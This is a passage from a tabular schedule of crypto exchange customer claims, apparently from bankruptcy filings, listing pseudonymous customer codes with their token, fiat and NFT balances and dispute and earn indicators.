| 07323469 | | DOGE[1764.04361951], USD[10.00] | | |
| 07323471 | | ETH[0], LINK[0], TRX[2056.37213597], USD[0.00] | | |
| 07323473 | | SOL[1.25304773], USD[0.00] | | |
| 07323474 | | BAT[1], BRZ[2], CUSDT[6], DOGE[2], ETH[.0001562], ETHW[.0001562], SHIB[1], SOL[33.96090115], TRX[1], USD[0.03], USDT[1.02543197] | Yes | |
| 07323475 | | CUSDT[3], DOGE[.63603864], TRX[1], USD[0.00] | | |
| 07323476 | | CUSDT[2], DOGE[1.39303344], SHIB[2], TRX[1], USD[167.30] | Yes | |
| 07323477 | | DOGE[16.97087474], USD[0.00] | | |
| 07323478 | | USD[10.00] | | |
| 07323479 | | CUSDT[2], DOGE[.55556554], USD[119.17] | | |
| 07323480 | | USD[0.00] | | |
| 07323481 | Contingent, Disputed | USD[10.00] | | |
| 07323482 | | USD[10.00] | | |
| 07323485 | | TRX[72.96812059], USD[0.00] | | |
| 07323486 | | USD[0.00] | | |
| 07323488 | | BRZ[1], USD[0.00] | | |
| 07323489 | | USD[0.00], USDT[0] | | |
| 07323490 | | USD[10.00] | | |
| 07323492 | | BRZ[1], DOGE[447.75252888], TRX[1], USD[0.00] | | |
| 07323494 | | DOGE[17.45312239], USD[0.00] | | |
| 07323495 | | USD[1.71], USDT[0] | | |
| 07323496 | | USD[0.00] | | |
| 07323497 | | USD[10.00] | | |
| 07323498 | | USD[9.99], USDT[.99438061] | Yes | |
| 07323499 | | USD[10.00] | | |
| 07323500 | | DOGE[230.07882073], USD[0.02], USDT[0] | | |
| 07323501 | | BF_POINT[100], BTC[.00009804], ETH[0], USD[0.66] | | |
| 07323502 | | USD[10.00] | | |
| 07323503 | | DOGE[1], USD[0.00] | | |
| 07323504 | | USD[10.00] | | |
| 07323505 | | BRZ[1], CUSDT[4], DOGE[2], TRX[2], USD[0.69] | | |
| 07323506 | | BTC[0], ETH[0], ETHW[0], SOL[0], USD[0.00] | Yes | |
| 07323509 | | BTC[.00006611], ETH[.000088], ETHW[.000088], USD[2.26] | | |
| 07323510 | | CUSDT[2], DOGE[1847.46480718], USD[7.54] | | |
| 07323511 | | USD[10.00] | | |
| 07323512 | | USD[0.01] | | |
| 07323513 | | USD[10.00] | | |
| 07323514 | | USD[10.00] | | |
| 07323515 | | DOGE[1], ETH[.0054927], ETHW[.0054927], USD[0.00] | | |
| 07323517 | | DOGE[17.74257178], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07323519 | | DOGE[122.81406319], USD[0.00] | | |
| 07323520 | | BTC[0.23000000], DOGE[.4354], LINK[55.18574606], SOL[32.709864], SUSHI[103.67801832], TRX[100369.7465], UNI[57.571387], USD[0.06] | | |
| 07323522 | | ETH[0], SHIB[118843.23227474], TRX[0], USD[0.00] | | |
| 07323523 | | BAT[4], BRZ[7], CUSDT[6], DOGE[1], GRT[2], NFT (308039165676594650/Dwayne Johnson Set #3)[1], NFT (364397793916917046/#6 (F))[1], NFT (535270337479008421/Solana Tiger)[1], NFT (535345584877610230/Smokey Scotch)[1], NFT (536556074878632224/Mutant Ape Pixel Derivative #2)[1], SHIB[9122882.73020684], SOL[7.02243039], TRX[8], USD[0.00] | | |
| 07323524 | | DOGE[0], USD[93.77] | | |
| 07323525 | | BAT[1.01402505], BRZ[5.07952967], CUSDT[7], DOGE[9.27400967], ETH[0], ETHW[0], GRT[1], SOL[0], TRX[3], USD[0.00], USDT[1.10600857] | Yes | |
| 07323526 | | DOGE[.92170704], ETH[0], USD[0.00] | | |
| 07323528 | | BRZ[1], CUSDT[1], USD[0.00] | | |
| 07323529 | | CUSDT[2], DOGE[2612.64378063], TRX[1], USD[0.00] | Yes | |
| 07323530 | | DOGE[0], ETH[0], LINK[0], LTC[0], SOL[0], TRX[0], USD[0.00], USDT[0] | | |
| 07323531 | | USD[10.00] | | |
| 07323532 | | USD[10.00] | | |
| 07323533 | | BCH[.02716837], CUSDT[1], DOGE[772.76858631], SUSHI[.62188978], USD[0.00] | | |
| 07323535 | | USD[10.00] | | |
| 07323537 | | USD[10.00] | | |
| 07323540 | | BTC[0], DOGE[0], ETH[.0000767], ETHW[0.00007669], USD[0.91], USDT[1.10198980] | | |
| 07323541 | | USD[300.00] | | |
| 07323543 | | BAT[1], BRZ[1], CUSDT[1], DOGE[1], ETHW[.00000988], SHIB[1], USD[4269.20], USDT[1.00015522] | Yes | |
| 07323544 | | USD[10.00] | | |
| 07323545 | | USD[10.00] | | |
| 07323546 | | USD[0.00], USDT[0] | | |
| 07323547 | | USD[10.00] | | |
| 07323549 | | USD[10.00] | | |
| 07323551 | | CUSDT[2], SOL[.00538452], USD[0.00], USDT[21.67617585] | | |
| 07323552 | | CUSDT[1], DOGE[206.60055872], TRX[5], USD[9.47] | | |
| 07323553 | | USD[10.00] | | |
| 07323554 | | USD[10.00] | | |
| 07323555 | | USD[10.00] | | |
| 07323556 | | USD[10.00] | | |
| 07323557 | | USD[10.00] | | |
| 07323558 | | BTC[0], USD[0.00] | | |
| 07323559 | | DOGE[1], USD[0.00] | | |
| 07323560 | | USD[31.10] | | |
| 07323561 | | BTC[.00016375], CUSDT[48.71751089], DOGE[12.57812765], ETH[.00076727], ETHW[.00076727], LINK[.01559096], USD[0.00] | | |
| 07323563 | | BTC[.0004954], DOGE[339.17346618], ETH[.00803262], ETHW[.00803262], USD[0.00] | | |
| 07323564 | | USD[10.00] | | |
| 07323565 | | USD[10.00] | | |
| 07323567 | | BF_POINT[100], BRZ[3], BTC[0], CUSDT[12], ETHW[.18637935], GRT[2], NFT (369253891807001272/FTX - Off The Grid Miami #72)[1], SHIB[2], SOL[.00034324], TRX[3.00079094], USD[941.42] | Yes | |
| 07323568 | | USD[11.01] | Yes | |
| 07323570 | | USD[10.99] | Yes | |
| 07323571 | | USD[10.00] | | |
| 07323573 | | BTC[0.00008501], DOGE[0.69200000] | | |
| 07323574 | | CUSDT[2], DOGE[.00004274], USD[0.01] | | |
| 07323575 | | USD[10.00] | | |
| 07323576 | | BAT[3], BRZ[2], CUSDT[1], USD[0.00], USDT[1] | | |
| 07323577 | | BRZ[2], CUSDT[1], TRX[1], USD[0.00] | | |
| 07323579 | | DOGE[0], GRT[0], LINK[0], LTC[0], NFT (501224686690162742/Bahrain Ticket Stub #2328)[1], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0] | Yes | |
| 07323580 | | BF_POINT[300], CUSDT[2], DOGE[4.05213569], USD[0.00] | Yes | |
| 07323581 | | USD[10.00] | | |
| 07323582 | | USD[10.00] | | |
| 07323585 | | GRT[6.02052585], USD[0.00] | | |
| 07323587 | | USD[10.00] | | |
| 07323588 | | USD[0.05] | | |
| 07323590 | | USD[10.00] | | |
| 07323591 | | BRZ[1], BTC[.02197175], CUSDT[3], DOGE[2.00004338], ETH[2.04296138], ETHW[2.04296138], LINK[99.12565539], TRX[1], USD[0.00] | | |
| 07323592 | | USD[10.00] | | |
| 07323593 | | BCH[0], BRZ[0], BTC[0], CUSDT[0], DOGE[0], ETH[0], GRT[0], LINK[0], LTC[0], NFT (434576925100278417/Fortuo Distinctus #108)[1], SHIB[190413.71287317], SOL[0], SUSHI[0], TRX[0], USD[0.00], USDT[0], YFI[0] | Yes | |
| 07323595 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07323596 | | USD[10.00] | | |
| 07323597 | | BTC[.00020646], CUSDT[2.78900374], DOGE[127.99410835], SHIB[2729078.03637105], TRX[2.66030135], USD[0.40] | | |
| 07323598 | | BAT[4.13128895], DOGE[50.17859565], PAXG[.00163436], SOL[.1458019], USD[0.00] | | |
| 07323599 | | USD[10.00] | | |
| 07323601 | | SUSHI[.00004882], TRX[1], USD[0.00] | | |
| 07323602 | | BRZ[1], CUSDT[3], DOGE[4], USD[0.00] | | |
| 07323604 | | CUSDT[1], DOGE[1], SHIB[753822.14372087], USD[0.00] | | |
| 07323606 | | USD[10.00] | | |
| 07323607 | | BAT[1], CUSDT[1], TRX[1], USD[0.00] | | |
| 07323609 | | BRZ[1], CUSDT[2], DOGE[.0000232], GRT[1], TRX[1], USD[0.00] | | |
| 07323610 | | CUSDT[1], USD[0.16] | Yes | |
| 07323612 | | USD[10.00] | | |
| 07323614 | | USD[10.00] | | |
| 07323615 | | BAT[21.8447999], BTC[.00499279], CUSDT[3], TRX[2], USD[0.96] | | |
| 07323617 | | TRX[1], USD[0.27] | | |
| 07323618 | | USD[10.00] | | |
| 07323619 | | DOGE[1.52991396], USD[0.00] | | |
| 07323620 | | USD[10.00] | | |
| 07323621 | | USD[10.00] | | |
| 07323622 | | BRZ[1], CUSDT[4], DOGE[137.45834840], ETH[.00000001], ETHW[.00000001], SHIB[1000003.92202178], TRX[2], USD[0.01] | | |
| 07323623 | | AUD[0.00], BRZ[2], CAD[0.03], CUSDT[8], DOGE[642.29086712], ETH[.00078875], ETHW[.00078875], GRT[2], TRX[1011.41576671], USD[0.87] | | |
| 07323625 | | BTC[.1131214], CUSDT[4], DOGE[11080.70866667], GRT[3420.91349274], LINK[137.66933119], MATIC[6244.03543034], SHIB[42481523.48736395], SOL[43.38251044], SUSHI[131.11134416], TRX[35456.85692261], USD[0.00], USDT[1.0762192] | Yes | |
| 07323626 | | DOGE[324.09271864], USD[0.00] | | |
| 07323627 | | USD[10.00] | | |
| 07323628 | | DOGE[10.70630129], USD[0.00] | | |
| 07323629 | | USD[10.00] | | |
| 07323630 | | USD[10.00] | | |
| 07323631 | | CUSDT[1], USD[0.00] | Yes | |
| 07323632 | | CUSDT[2], USD[0.01] | | |
| 07323633 | | BAT[0], BTC[0], DOGE[29], ETH[0], ETHW[0], GRT[0], LTC[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.22] | | |
| 07323634 | | CUSDT[5], DOGE[290.88227564], TRX[1], USD[0.00] | | |
| 07323635 | | BTC[.01101674], CUSDT[3], ETH[.07152857], ETHW[.07152857], NFT (458668217094777036/Barcelona Ticket Stub #186)[1], NFT (570318381866157619/Saudi Arabia Ticket Stub #698)[1], SHIB[520506.18740915], SOL[20584426], TRX[724.06315973], USD[0.00] | | |
| 07323636 | | USD[10.00] | | |
| 07323637 | | DOGE[2], GRT[5.19279839], USD[0.00] | | |
| 07323638 | | BRZ[1], CUSDT[8], SHIB[3153689.80267364], TRX[3], USD[0.00] | | |
| 07323640 | | BAT[1], BRZ[5], BTC[0], CUSDT[3], DOGE[1], ETH[0.16544333], ETHW[0.16544333], GRT[2], TRX[8], USD[500.00], USDT[1.00000001] | | |
| 07323641 | | DOGE[2], TRX[2], USD[10.00], USDT[.64297934] | | |
| 07323643 | | USD[10.00] | | |
| 07323644 | | DOGE[.3427], USD[0.00] | | |
| 07323646 | | USD[0.02] | Yes | |
| 07323649 | | DOGE[157.07116312], USD[0.00] | Yes | |
| 07323650 | | USD[10.00] | | |
| 07323652 | | BTC[.00042408], CUSDT[1], DOGE[32.68781868], USD[0.00] | | |
| 07323653 | | USD[10.00] | | |
| 07323654 | | DOGE[632.5404498], TRX[1], USD[0.26] | | |
| 07323655 | | USD[10.00] | | |
| 07323656 | | USD[10.00] | | |
| 07323657 | | USD[10.00] | | |
| 07323658 | | CUSDT[2], DOGE[1082.53822484], SUSHI[3.17973321], USD[0.00] | Yes | |
| 07323659 | | USD[10.00] | | |
| 07323660 | | DOGE[1], SHIB[1], USD[36.09] | Yes | |
| 07323661 | | USD[10.00] | | |
| 07323664 | | DOGE[1], TRX[1], USD[0.00] | | |
| 07323665 | | CUSDT[1], USD[0.00] | | |
| 07323666 | | CUSDT[13], USD[0.00] | | |
| 07323668 | | BTC[.00376903], CUSDT[1], DOGE[1], USD[10.00], USDT[2.64450414] | | |
| 07323669 | | DOGE[.0007633], TRX[2], USD[0.01] | | |
| 07323671 | | CUSDT[1], DOGE[60.81083709], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07323672 | | BAT[1], BRZ[8.60024425], CUSDT[11], DOGE[31595.0904251], ETH[.85629703], ETHW[.85593731], GRT[9471.86468202], LINK[3.31389623], SHIB[77464896.13514098], SUSHI[766.40280488], TRX[10.00969136], UNI[1.10463244], USD[0.00], USDT[7.71518102] | Yes | |
| 07323673 | | DOGE[36.5290573], ETH[.02058893], ETHW[.02058893], SOL[.996], USD[22.54], USDT[0.00000001] | | |
| 07323674 | | BTC[.00173749], CUSDT[3], DOGE[2], ETH[0.00000570], ETHW[0.00000570], GRT[1.00498957], TRX[3], USD[0.00], USDT[0] | Yes | |
| 07323675 | | USD[10.00] | | |
| 07323676 | | USD[0.00], YFI[.00028421] | | |
| 07323677 | | CUSDT[1], DOGE[1], ETH[.0287054], ETHW[.02834972], SOL[17.53064799], TRX[4.59548224], USD[0.00] | Yes | |
| 07323679 | | DOGE[2305.50357851], USD[0.00] | Yes | |
| 07323680 | | DOGE[2173.1076871], SHIB[3092658.40719013], USD[256.20] | Yes | |
| 07323681 | | SHIB[1], USD[0.01] | Yes | |
| 07323682 | | USD[10.00] | | |
| 07323684 | | DOGE[877.37398422], USD[0.00] | | |
| 07323686 | | USD[10.00] | | |
| 07323687 | | USD[10.00] | | |
| 07323688 | | CUSDT[1], DOGE[1380.52340184], USD[0.00] | | |
| 07323689 | | USD[10.00] | | |
| 07323690 | | CUSDT[8], DOGE[.00449063], SHIB[2], TRX[3], USD[0.01] | Yes | |
| 07323691 | | USD[10.00] | | |
| 07323692 | | DOGE[632.10056421], TRX[1], USD[9.81] | | |
| 07323693 | | DOGE[50.25258583], TRX[1], USD[0.00] | | |
| 07323694 | | USD[10.00] | | |
| 07323695 | | BRZ[0], BTC[0], DOGE[0.02952970], LTC[0], USD[0.00], USDT[0] | | |
| 07323696 | | BTC[.00001879], CUSDT[2], DOGE[44.69547582], USD[-1.15] | Yes | |
| 07323698 | | ETH[0], USD[0.00] | | |
| 07323699 | | BCH[.00639543], ETH[.00230298], ETHW[.00227562], USD[0.00], USDT[0.00000001] | Yes | |
| 07323701 | | USD[10.00] | | |
| 07323703 | | USD[0.01], USDT[0] | | |
| 07323704 | | TRX[148.14842026], USD[0.00] | | |
| 07323705 | | DOGE[138.45295437], TRX[1], USD[0.00] | | |
| 07323706 | | BRZ[2], CUSDT[2], USD[0.01] | | |
| 07323712 | | USD[10.00] | | |
| 07323714 | | BCH[0], BTC[0], DOGE[0], ETH[0], KSHIB[0], LINK[0], LTC[0], SOL[0], TRX[0], UNI[0], USD[0.01], USDT[0] | Yes | |
| 07323716 | | USD[10.00] | | |
| 07323718 | | USD[10.46] | Yes | |
| 07323722 | | BRZ[1], CUSDT[1], DOGE[1], TRX[2], USD[0.01], USDT[1] | | |
| 07323723 | | USD[10.00] | | |
| 07323724 | | USD[10.00] | | |
| 07323725 | | BRZ[1], CUSDT[5], DOGE[105.83264294], ETH[.01575762], ETHW[.0155661], SHIB[1], TRX[2], USD[0.00] | Yes | |
| 07323727 | | USD[0.01], USDT[3.264802] | | |
| 07323728 | | USD[10.00] | | |
| 07323729 | | BRZ[2], CUSDT[3], DOGE[1], SHIB[2242152.46636771], TRX[3], UNI[1], USD[0.01] | | |
| 07323730 | | DOGE[55.01944079], USD[0.00] | Yes | |
| 07323731 | | USD[10.00] | | |
| 07323732 | | USD[0.00] | | |
| 07323734 | | USD[10.00] | | |
| 07323735 | | USD[10.00] | | |
| 07323736 | | BRZ[1], DOGE[1], USD[0.01] | Yes | |
| 07323737 | | USD[10.00] | | |
| 07323738 | | USD[10.00] | | |
| 07323739 | | BTC[0], SOL[0], USD[0.35] | | |
| 07323740 | | BRZ[1], CUSDT[2], DOGE[1625.24327889], NFT (352737806903314207/Dream Land #8)[1], NFT (456835122336636597/Some special )[1], USD[0.00] | Yes | |
| 07323741 | | DOGE[196.56275277], TRX[1], USD[0.00] | | |
| 07323742 | | USD[10.00] | | |
| 07323743 | | USD[10.00] | | |
| 07323744 | | USD[10.00] | | |
| 07323745 | | USD[10.00] | | |
| 07323746 | | USD[10.00] | | |
| 07323747 | | BTC[.00020566], USD[0.00] | | |
| 07323748 | | BAT[1], BTC[0], CUSDT[2], USD[0.88] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07323750 | | BRZ[0], DOGE[0], USD[0.00] | | |
| 07323751 | | NFT (382973768696408386/Dune time )[1], NFT (394692197600760706/Jeep Jeep )[1], NFT (497735612005548720/CryptoAvatar #150)[1], NFT (509598047759909363/FTX Crypto Cup 2022 Key #762)[1], USD[0.47] | Yes | |
| 07323753 | | USD[10.00] | | |
| 07323754 | | USD[10.00] | | |
| 07323756 | | USD[10.00] | | |
| 07323757 | | DOGE[.665], USD[0.03] | | |
| 07323758 | | BAT[0], BTC[0], CUSDT[0], DOGE[0], ETH[0], LINK[0], SHIB[79758.10348717], TRX[0], USD[0.00] | Yes | |
| 07323759 | | USD[10.00] | | |
| 07323760 | | BTC[.00020755], USD[0.00] | | |
| 07323761 | | TRX[1], USD[9.79] | | |
| 07323763 | | BRZ[1], CUSDT[5], SUSHI[5.97215096], USD[0.00] | Yes | |
| 07323764 | | BAT[310.00902232], BTC[.00370564], CUSDT[11479.26755665], DOGE[17895.40110007], ETH[.01269099], ETHW[.01253231], GRT[55.60367162], KSHIB[765.45668645], LTC[.12803723], SHIB[5], SOL[7.63803796], TRX[6316.59082949], UNI[1.54790525], USD[0.04] | Yes | |
| 07323768 | | USD[10.00] | | |
| 07323770 | | USD[10.00] | | |
| 07323771 | | CUSDT[6], DOGE[419.05041782], ETH[.50905616], ETHW[.50905616], TRX[1], USD[0.00] | | |
| 07323772 | | BTC[.0007234], CUSDT[8], ETH[.00069474], ETHW[.00069085], TRX[2], USD[0.00] | Yes | |
| 07323773 | | CUSDT[4], DOGE[1], TRX[4], USD[0.00] | | |
| 07323774 | | USD[10.00] | | |
| 07323775 | | CUSDT[4], DOGE[4455.22616035], TRX[1], USD[0.00] | Yes | |
| 07323777 | | USD[10.00] | | |
| 07323778 | | DOGE[46.13983937], USD[0.00] | Yes | |
| 07323779 | | BTC[.00021443], USD[0.00] | | |
| 07323780 | | BAT[1], USD[0.01] | | |
| 07323781 | | BRZ[1], CUSDT[5], DOGE[966.91263853], GRT[1], SHIB[1859427.29639271], TRX[1], USD[309.43] | | |
| 07323783 | | USD[30.00] | | |
| 07323786 | | USD[10.00] | | |
| 07323787 | | CUSDT[3], DOGE[150.35705655], USD[79.40] | | |
| 07323788 | | BAT[3.05522269], BRZ[2], BTC[.00000012], CUSDT[9], DOGE[3], ETH[.00021899], ETHW[1.44257046], GRT[1.00498957], MATIC[.00469934], SHIB[4], TRX[2], USD[10272.84], USDT[3.16543006] | Yes | |
| 07323789 | | USD[10.00] | | |
| 07323790 | | USD[10.00] | | |
| 07323791 | | DOGE[13256.059], USD[0.12] | | |
| 07323792 | | USD[2.22] | | |
| 07323793 | | BTC[0], CUSDT[1], USD[0.00] | | |
| 07323795 | | ETH[.05], ETHW[.05], LINK[39], SOL[0], USD[5.41] | | |
| 07323796 | | BTC[.00300811], DOGE[.00244069], USD[0.00], USDT[0] | | |
| 07323797 | | USD[10.00] | | |
| 07323799 | | USD[11.04] | Yes | |
| 07323801 | | USD[10.00] | | |
| 07323802 | | USD[0.00] | | |
| 07323803 | | USD[10.00] | | |
| 07323804 | | BRZ[1], CUSDT[6], DOGE[.88820529], ETH[.00092908], ETHW[.0009154], USD[0.76] | Yes | |
| 07323805 | | CUSDT[1], LINK[.36646875], USD[0.01] | | |
| 07323806 | | USD[10.00] | | |
| 07323807 | | BTC[.00011048], CUSDT[3], DOGE[0], USD[0.00] | | |
| 07323810 | | USD[0.31] | | |
| 07323812 | | USD[10.00] | | |
| 07323813 | | USD[10.00] | | |
| 07323815 | | USD[10.00] | | |
| 07323817 | | BTC[0], DOGE[2], ETH[0.00001521], ETHW[1.66510614], LINK[8.93664082], TRX[4], USD[0.01], USDT[1.10365607] | Yes | |
| 07323818 | | BRZ[1], CUSDT[1], DOGE[3.000548], LTC[.00002398], TRX[1], USD[0.00] | Yes | |
| 07323819 | | CUSDT[1], DOGE[1], TRX[1], USD[0.01] | | |
| 07323820 | | BAT[1.01655549], CUSDT[1], DOGE[960.92937685], ETH[0], LINK[20.28880044], TRX[3], USD[0.00] | Yes | |
| 07323821 | | DOGE[4], USD[0.01] | | |
| 07323822 | | USD[0.01] | | |
| 07323823 | | BTC[.0003], USD[10.00] | | |
| 07323828 | | USD[0.00] | | |
| 07323829 | | USD[10.00] | | |
| 07323830 | | BTC[0], LINK[0], NFT (472395517942853259/Serum Surfers #3509)[1], SOL[0.00820000], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07323831 | | USD[10.00] | | |
| 07323832 | | USD[10.00] | | |
| 07323834 | | USD[10.00] | | |
| 07323835 | | USD[10.00] | | |
| 07323836 | | CUSDT[3], DOGE[.00095284], TRX[1], USD[0.00] | | |
| 07323837 | | USD[10.00] | | |
| 07323838 | | BAT[1], BRZ[4], BTC[.00001512], CUSDT[0], DOGE[10.16699245], ETH[.00007218], GRT[1], NEAR[.00114949], NFT (320904487581444121/Good Boy #10705)[1], SHIB[866812.43348457], SOL[.00287963], TRX[7], USD[135.44], USDT[1.03141106] | Yes | |
| 07323839 | | CUSDT[3], DOGE[1], TRX[1], USD[0.00], USDT[1] | | |
| 07323840 | | CUSDT[3], DOGE[115.95460935], ETH[.00000004], ETHW[.00000004], USD[0.00] | Yes | |
| 07323841 | | BRZ[0], BTC[0], DAI[0], DOGE[2], ETH[0.19618000], ETHW[0.19618000], SOL[0], TRX[1], USD[0.32], YFI[0] | | |
| 07323843 | | DOGE[1099.36872156], TRX[1], USD[0.01] | | |
| 07323844 | | USD[10.00] | | |
| 07323846 | | ETH[0], ETHW[0], SOL[0.86757224], USD[0.00] | | |
| 07323849 | | USD[10.00] | | |
| 07323850 | | DOGE[128.40901867], USD[0.00] | | |
| 07323851 | | USD[10.00] | | |
| 07323852 | | BRZ[0], CUSDT[1], DOGE[1], TRX[24.03984856], USD[0.00], USDT[0] | | |
| 07323853 | | BCH[.00000181], BRZ[1], CUSDT[3], DOGE[1], ETH[0], ETHW[0], SHIB[1], SUSHI[.00000908], TRX[1], USD[0.00], USDT[0] | | |
| 07323854 | | DOGE[158.39294328], USD[0.00] | | |
| 07323856 | | BAT[2], BRZ[1], CUSDT[10], DOGE[2046.56895535], ETH[.04640183], ETHW[.04640183], GRT[1], TRX[4], USD[0.54] | | |
| 07323859 | | BTC[0], CUSDT[1], DOGE[0], ETH[0], SUSHI[0], USD[0.00] | | |
| 07323860 | | USD[2.36] | | |
| 07323861 | | USD[10.00] | | |
| 07323862 | | DOGE[.4414828], USD[0.01] | | |
| 07323863 | | USD[0.00] | | |
| 07323864 | | CUSDT[1], DOGE[19.18840708], USD[0.01] | | |
| 07323865 | | DOGE[0] | | |
| 07323866 | | BF_POINT[600], USD[15013.09] | | |
| 07323867 | | USD[10.00] | | |
| 07323869 | | USD[10.00] | | |
| 07323873 | | USD[10.00] | | |
| 07323876 | | CUSDT[2], DOGE[233.60983216], TRX[1], USD[0.00] | | |
| 07323878 | | DOGE[417.84359794], SHIB[20968.6080586], USD[0.00] | Yes | |
| 07323879 | | USD[10.13] | Yes | |
| 07323880 | | USD[10.00] | | |
| 07323881 | | USD[10.00] | | |
| 07323882 | | USD[10.00] | | |
| 07323884 | | BAT[1.0165555], CUSDT[2], USD[0.05], USDT[0] | Yes | |
| 07323885 | | BAT[0], BTC[0], DOGE[32.76060000], ETH[.00000001], ETHW[0], SOL[0], SUSHI[0], TRX[0], USD[0.00], USDT[0.00000097] | | |
| 07323886 | | USD[10.00] | | |
| 07323888 | | USD[10.00] | | |
| 07323889 | | GRT[.00057203], USD[0.00] | | |
| 07323892 | | USD[10.00] | | |
| 07323893 | | BRZ[1], CUSDT[3], TRX[4], USD[0.00] | | |
| 07323894 | | NFT (449850322731558683/Shaq's Fun House presented by FTX #30)[1], USD[0.00] | Yes | |
| 07323898 | | DOGE[146.6317], USD[0.00] | | |
| 07323899 | | USD[10.00] | | |
| 07323900 | | USD[10.00] | | |
| 07323901 | | DOGE[136.56605208], USD[0.00] | | |
| 07323902 | | DOGE[778.26122292], USD[0.00] | | |
| 07323906 | | BRZ[1], BTC[.00000087], CUSDT[2], USD[0.00] | | |
| 07323909 | | CUSDT[8], DOGE[100.24804832], TRX[135.81651207], USD[0.04] | Yes | |
| 07323910 | | USD[10.00] | | |
| 07323911 | | CUSDT[1], DOGE[2934.52688954], LINK[5.79893389], TRX[1], USD[0.00] | | |
| 07323912 | | USD[10.00] | | |
| 07323914 | | BRZ[1], CUSDT[1], DOGE[1.02095419], USD[0.01] | | |
| 07323915 | | DOGE[1], LTC[0], USD[0.00], USDT[0] | | |
| 07323916 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07323918 | | DOGE[161.838], USD[0.04] | | |
| 07323919 | | USD[10.00] | | |
| 07323921 | | USD[10.00] | | |
| 07323925 | | DOGE[1191.33715572], TRX[1199.29429441], USD[0.00] | | |
| 07323926 | | USD[10.00] | | |
| 07323928 | | DOGE[.306], USD[0.05] | | |
| 07323929 | | BTC[.0001476], DOGE[135.5820031], USD[10.00] | | |
| 07323930 | | USD[10.00] | | |
| 07323931 | | DAI[.05247606], ETH[0], ETHW[0], LTC[0], MATIC[1.66901571], NFT (313684835052272855/FTX Crypto Cup 2022 Key #1576)[1], NFT (320161658594345495/Ballpark Bobblers 2022 - ID: 44E923CF)[1], NFT (373050168970873947/Australia Ticket Stub #1631)[1], NFT (377852795223401438/Monaco Ticket Stub #26)[1], NFT (435006865623788996/Baku Ticket Stub #283)[1], NFT (446516162281312035/Vintage Sahara #554)[1], NFT (452573441504590074/Vintage Sahara #62)[1], NFT (457972125480101212/Cosmic Creations #908)[1], NFT (462244680956223295/Barcelona Ticket Stub #1354)[1], NFT (514521795702297149/Montreal Ticket Stub #242)[1], NFT (526242879970012938/Ferris From Afar #833)[1], NFT (537617013545621709/The Hill by FTX #4136)[1], SHIB[27933.20894044], SOL[0], USD[0.00] | | |
| 07323933 | | BTC[.00023973], USD[0.00] | | |
| 07323934 | | USD[10.00] | | |
| 07323935 | | DOGE[1], ETH[0], SUSHI[0], TRX[.00001947], USD[0.00] | | |
| 07323936 | | CUSDT[1], TRX[1], USD[0.01] | | |
| 07323938 | | USD[10.00] | | |
| 07323939 | | BRZ[0], BTC[0], CUSDT[2], DOGE[0], ETH[0], ETHW[0], SHIB[1], SOL[0], USD[0.00], USDT[1.0663745] | Yes | |
| 07323942 | | DOGE[0], LTC[0], TRX[0], USD[0.07] | | |
| 07323944 | | BAT[2.0665049], BF_POINT[200], BTC[0.03973781], CUSDT[2], DOGE[572.13814683], ETH[.33198722], ETHW[35.49022039], GRT[3.0460644], MATIC[1000], NFT (472011816848364459/FTX - Off The Grid Miami #405)[1], SHIB[1], SOL[12.00830862], TRX[4], UNI[1.07021318], USD[0.00], USDT[1.07063421] | Yes | |
| 07323946 | | USD[0.01] | | |
| 07323947 | | CUSDT[1], DOGE[867.21141424], TRX[335.76410879], USD[0.00] | | |
| 07323948 | | BTC[.0200371], DOGE[639.26], ETH[.019982], ETHW[.019982], GRT[99.9], SUSHI[1.998], TRX[266.928], USD[0.25] | | |
| 07323949 | | DOGE[1], USD[0.00] | | |
| 07323950 | | DOGE[1.16102218], USD[0.00] | | |
| 07323951 | | BCH[0], BRZ[0], BTC[0], DOGE[0], ETH[0], LTC[0], TRX[0], UNI[0], USD[0.01], USDT[0] | Yes | |
| 07323952 | | USD[10.00] | | |
| 07323953 | | USD[10.00] | | |
| 07323954 | | ETH[.00000631], ETHW[.00000631], TRX[172.2750791], USD[0.00] | Yes | |
| 07323955 | | USD[10.00] | | |
| 07323956 | | USD[0.00] | Yes | |
| 07323957 | | USD[10.00] | | |
| 07323959 | | USD[10.00] | | |
| 07323961 | | USD[11.07] | Yes | |
| 07323962 | | CUSDT[2], DOGE[1], TRX[1], USD[0.01] | | |
| 07323963 | | USD[10.00] | | |
| 07323965 | | BTC[0], DOGE[2], USD[0.00] | | |
| 07323966 | | USD[10.00] | | |
| 07323967 | | BF_POINT[300] | Yes | |
| 07323968 | | USD[10.00] | | |
| 07323970 | | BTC[.00000008], CUSDT[0], LINK[0], LTC[0.00000139], SHIB[27], SOL[0.00000129], SUSHI[0], TRX[0], USD[0.00], USDT[0.00000001] | Yes | |
| 07323971 | | USD[11.10] | Yes | |
| 07323972 | | GRT[9.55808688], USD[0.00] | Yes | |
| 07323973 | | USD[10.00] | | |
| 07323974 | | BRZ[2], CUSDT[4], DOGE[10.4482988], SOL[370.2008892], TRX[4], USD[8.55], USDT[2.17141935] | Yes | |
| 07323975 | | DOGE[0], USD[368.36] | | |
| 07323976 | | BAT[31.48596342], BTC[0], CUSDT[2], DOGE[0.04319450], ETH[.01537238], ETHW[0.00022536], SOL[0], USD[1008.66] | Yes | |
| 07323979 | | CUSDT[2], USD[0.00] | | |
